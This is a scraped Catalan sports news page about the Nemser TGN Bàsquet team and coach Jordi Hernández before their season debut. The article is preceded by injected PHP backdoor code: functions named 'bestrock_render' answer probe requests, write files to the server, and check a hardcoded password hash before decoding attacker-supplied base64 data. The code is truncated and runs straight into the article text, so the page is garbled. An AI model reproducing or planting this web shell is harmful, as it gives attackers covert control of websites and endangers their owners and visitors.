function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Nemser TGN Bàsquet fa pinya en vista al primer partit de la temporada - Tgn Bàsquet Club -

El Nemser TGN Bàsquet fa pinya en vista al primer partit de la temporada

By
Updated: setembre 24, 2014

“El nostre bàsquet és molt directe, molt vertical. Tothom ha d’atacar la cistella, començar atacant des de la defensa”. De cara a barraca. Aquesta és la nova filosofia del Nemser TGB Bàsquet en la temporada que és a punt de començar. L’equip que enguany entrena Jordi Hernández debuta al pavelló del Sagrat Cor aquest diumenge (19 h) contra el Grup Barna, en un partit on ja s’hauran acabat les proves i començarà la competició pura i dura. “Crec que arribem en un bon moment. Com a entrenador sempre penses que podries haver fet alguna cosa més, però en general estic content i físicament les noies estan a punt”, explica el tècnic lila. Així, han estat 4 setmanes d’entrenaments amb 4 sessions preparatòries cadascuna i s’han jugat 6 partits amistosos en aquest període de temps. “Hi ha una gran implicació entre totes les jugadores a l’hora de fer aquest canvi de xip, de trobar un bàsquet més vertical. Ara només cal que entrin els tirs”, assegura.

La imminència del debut i la dificultat de conèixer els rivals abans de l’inici de lliga fa que Hernández sigui prudent en quant a objectius hores d’ara, però admet que mantenir la categoria seria fonamental. “Perdre la categoria seria un drama, una gran derrota, això és evident. Ara, però, hem d’anar partit a partit i no ens hem de marcar grans fites, sense renunciar a res, això sí”, diu. Pel matx de diumenge, Jordi Hernández podrà comptar amb Irene Villegas, que es va perdre tot el tram final del curs passat per una lesió al genoll. Villegas ja va disputar alguns minuts en el matx amistós de dissabte passat contra el Valls de segona catalana i tot indica que podrà jugar també contra el Grup Barna. “Físicament pot jugar, ara li falta recuperar la confiança dins la pista, perdre la por a l’hora d’anar al xoc, una característica comú en els que han estat afectats per una lesió així.”

 

.

Deixa un comentari

L'adreça electrònica no es publicarà. Els camps necessaris estan marcats amb *